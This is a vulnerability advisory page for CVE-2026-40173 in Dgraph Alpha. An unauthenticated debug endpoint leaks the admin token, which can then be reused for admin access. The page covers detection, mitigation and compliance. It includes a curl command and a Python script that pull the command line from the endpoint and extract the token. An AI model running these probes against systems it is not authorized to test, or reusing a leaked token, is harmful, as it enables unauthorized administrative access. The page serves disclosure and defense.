CVE-2026-40173
Unauthenticated Credential Disclosure in Dgraph Alpha Enables Admin Access

Publication date: 2026-04-15

Last updated on: 2026-04-25

Assigner: GitHub, Inc.

Description
Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security "token=..." startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.
Meta Information
Published: 2026-04-15
Last Modified: 2026-04-25
Generated: 2026-05-07
AI Q&A: 2026-04-16
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor: dgraph
Product: dgraph
Version / Range: versions before 25.3.2 (25.3.2 excluded), i.e. 25.3.1 and prior
CWE ID Description
CWE-215 The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.
CWE-200 The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
CWE-522 The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in Dgraph versions 25.3.1 and earlier. The Alpha process registers Go's /debug/pprof/cmdline handler on its default HTTP mux without any authentication, and that handler returns the full process command line, including the admin token passed at startup via --security "token=...".

An attacker who can reach the Alpha HTTP port requests that endpoint, reads the token out of the response, and sends it in the X-Dgraph-AuthToken header. The adminAuthHandler only compares the header against the configured token, so the leaked value passes the check and grants access to admin-only endpoints such as /admin/config/cache_mb.


How can this vulnerability impact me?

The vulnerability allows an attacker to gain unauthorized privileged administrative access to the Dgraph database.

  • They can perform configuration changes.
  • They can execute operational control actions.

This can happen in any deployment where the Alpha HTTP port is accessible by untrusted parties, potentially compromising the integrity and availability of the database.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Two checks apply. First, confirm the running version: any Alpha reporting 25.3.1 or earlier is affected (dgraph version on the host prints it). Second, probe the Alpha HTTP port (default 8080) for the exposed endpoint. The handler returns the process arguments joined by NUL bytes, so translate them to newlines before reading the output:

  • Probe the endpoint without credentials: curl -s http://<dgraph-alpha-host>:8080/debug/pprof/cmdline | tr '\0' '\n'
  • If the request succeeds, the debug endpoint is exposed to anyone who can reach the port. If the output contains a --security argument with token=..., the admin token is leaked and the instance is exploitable as described.
  • A 404 or an authentication error means the unauthenticated handler is not reachable from that vantage point; repeat the probe from every network that can reach the Alpha HTTP port, not only from localhost.
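The probe above, as an added example for this page (it is not Dgraph project code): it fetches /debug/pprof/cmdline, splits the Go pprof response (the process arguments joined by NUL bytes), and reports whether a --security token= value is present. The superflag format assumed here (key=value pairs separated by ";", passed as either "--security <value>" or "--security=<value>") and the sample response are assumptions constructed for the example, not captured from a real instance.

```python
"""Probe a Dgraph Alpha HTTP port for CVE-2026-40173 (added example, not
Dgraph project code). Usage: python probe.py http://<alpha-host>:8080
With no argument it runs against a constructed sample response."""
import sys
import urllib.request
from typing import Dict, List, Optional
from urllib.error import HTTPError, URLError


def parse_cmdline(body: bytes) -> List[str]:
    """Split a pprof cmdline body into arguments (Go joins os.Args with NUL)."""
    return body.decode("utf-8", errors="replace").split("\x00")


def extract_security_token(args: List[str]) -> Optional[str]:
    """Return the token= value of the --security superflag, if any.

    Assumption: the superflag is given as '--security <value>' or
    '--security=<value>', with 'key=value' pairs separated by ';'.
    """
    for i, arg in enumerate(args):
        if arg == "--security" and i + 1 < len(args):
            value = args[i + 1]
        elif arg.startswith("--security="):
            value = arg.split("=", 1)[1]
        else:
            continue
        for pair in value.split(";"):
            key, sep, val = pair.strip().partition("=")
            if sep and key.strip() == "token" and val.strip():
                return val.strip()
    return None


def fetch_cmdline(base_url: str, timeout: float = 5.0) -> Optional[bytes]:
    """GET /debug/pprof/cmdline without credentials; None if not reachable."""
    url = base_url.rstrip("/") + "/debug/pprof/cmdline"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (HTTPError, URLError):
        # Non-2xx (e.g. 401/404) or a connection failure: the unauthenticated
        # handler is not reachable from this vantage point.
        return None


def assess(body: Optional[bytes]) -> Dict[str, object]:
    """Classify a probe result: endpoint exposed? token leaked? which token?"""
    if body is None:
        return {"endpoint_exposed": False, "token_leaked": False, "token": None}
    token = extract_security_token(parse_cmdline(body))
    return {"endpoint_exposed": True, "token_leaked": token is not None, "token": token}


def mask(token: str) -> str:
    """Report only the first two characters so the token is not re-logged."""
    return token[:2] + "*" * max(len(token) - 2, 0)


# Constructed sample response (not captured from a real instance): what a
# vulnerable Alpha started with --security "token=...; whitelist=..." returns.
SAMPLE_RESPONSE = (
    b"/usr/local/bin/dgraph\x00alpha\x00--my=alpha1:7080\x00"
    b"--security\x00token=s3cret-admin; whitelist=10.0.0.0/8"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = assess(fetch_cmdline(sys.argv[1]))
    else:
        result = assess(SAMPLE_RESPONSE)
    if not result["endpoint_exposed"]:
        print("debug endpoint not reachable without authentication")
    elif result["token_leaked"]:
        print("VULNERABLE: admin token leaked:", mask(str(result["token"])))
    else:
        print("endpoint exposed (command line leaks) but no --security token found")
```

An exposed endpoint without a token is still an information leak (the full command line is visible), and a leaked token should be treated as compromised rather than merely noted.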

What immediate steps should I take to mitigate this vulnerability?

Upgrade Dgraph to version 25.3.2 or later, where this vulnerability has been fixed. Because the token was readable by anyone who could reach the Alpha HTTP port, treat it as compromised: after upgrading, restart Alpha with a new --security "token=..." value and update every client that uses X-Dgraph-AuthToken.

Until the upgrade can be performed, restrict the Alpha HTTP port (default 8080) to trusted parties only, using firewall rules or network segmentation, so that untrusted parties cannot reach the vulnerable endpoint.

The debug handler shares the same listener as the regular HTTP API, so it cannot be closed on its own at the network layer; if a reverse proxy already fronts Alpha, additionally deny requests to /debug/ paths there.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows an attacker to gain unauthorized privileged administrative access by retrieving an exposed admin token. Such unauthorized access can lead to unauthorized configuration changes and operational control, potentially resulting in unauthorized data access or modification.

While the CVE description does not explicitly mention compliance with standards like GDPR or HIPAA, unauthorized administrative access and potential data exposure or manipulation could lead to violations of these regulations, which require strict controls on access to sensitive data and system integrity.

